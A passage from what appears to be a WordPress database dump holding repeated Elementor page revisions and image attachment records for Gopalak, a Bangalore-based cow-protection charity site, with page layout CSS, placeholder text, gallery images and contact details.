img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/logo1211-pw1l8axyrm0vuixq49dusjmg8mk5kn3o880cka986m.png\" title=\"logo1211\" alt=\"logo1211\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:58','2022-10-12 07:19:58','',1373,'https://gopalak.in/?p=1683',0,'revision','',0),(1684,1,'2022-10-12 12:49:58','2022-10-12 07:19:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/logo1211-pw1l8axyrm0vuixq49dusjmg8mk5kn3o880cka986m.png\" title=\"logo1211\" alt=\"logo1211\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:58','2022-10-12 07:19:58','',1373,'https://gopalak.in/?p=1684',0,'revision','',0),(1685,1,'2022-10-12 12:49:58','2022-10-12 07:19:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:58','2022-10-12 07:19:58','',1373,'https://gopalak.in/?p=1685',0,'revision','',0),(1687,1,'2022-10-13 15:39:38','2022-10-13 10:09:38','','pexels-kelly-2881385','','inherit','open','closed','','pexels-kelly-2881385','','','2022-10-13 15:39:38','2022-10-13 10:09:38','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385.jpg',0,'attachment','image/jpeg',0),(1688,1,'2022-10-13 15:39:49','2022-10-13 10:09:49','','pexels-karolina-grabowska-4219654','','inherit','open','closed','','pexels-karolina-grabowska-4219654','','','2022-10-13 15:39:49','2022-10-13 10:09:49','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654.jpg',0,'attachment','image/jpeg',0),(1689,1,'2022-10-13 15:40:01','2022-10-13 10:10:01','','pexels-kat-smith-735976','','inherit','open','closed','','pexels-kat-smith-735976','','','2022-10-13 15:40:01','2022-10-13 10:10:01','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976.jpg',0,'attachment','image/jpeg',0),(1690,1,'2022-10-13 15:40:12','2022-10-13 10:10:12','','pexels-mark-stebnicki-2602864','','inherit','open','closed','','pexels-mark-stebnicki-2602864','','','2022-10-13 15:40:12','2022-10-13 10:10:12','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864.jpg',0,'attachment','image/jpeg',0),(1691,1,'2022-10-13 15:40:20','2022-10-13 10:10:20','','pexels-mark-stebnicki-2252557','','inherit','open','closed','','pexels-mark-stebnicki-2252557','','','2022-10-13 15:40:20','2022-10-13 10:10:20','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557.jpg',0,'attachment','image/jpeg',0),(1692,1,'2022-10-13 15:40:31','2022-10-13 10:10:31','','pexels-ave-calvar-martinez-3637852','','inherit','open','closed','','pexels-ave-calvar-martinez-3637852','','','2022-10-13 15:40:31','2022-10-13 10:10:31','',0,'https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852.jpg',0,'attachment','image/jpeg',0),(1693,1,'2022-10-13 15:43:49','2022-10-13 10:13:49','','Frame','','inherit','open','closed','','frame','','','2022-10-13 15:43:49','2022-10-13 10:13:49','',1373,'https://gopalak.in/wp-content/uploads/2022/10/Frame.png',0,'attachment','image/png',0),(1694,1,'2022-10-13 15:45:03','2022-10-13 10:15:03','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			